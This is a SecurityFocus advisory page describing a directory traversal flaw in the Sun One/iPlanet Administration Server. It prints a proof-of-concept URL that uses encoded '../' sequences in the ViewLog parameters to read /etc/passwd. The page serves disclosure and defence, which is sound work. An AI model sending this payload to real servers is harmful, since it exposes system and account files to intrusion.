Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Sun One/IPlanet Administration Server Directory Traversal Vulnerability

No exploit is required for this vulnerability.

The following proof-of-concept has been made available:

http://www.example.com:5000/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv







 

Privacy Statement
Copyright 2009, SecurityFocus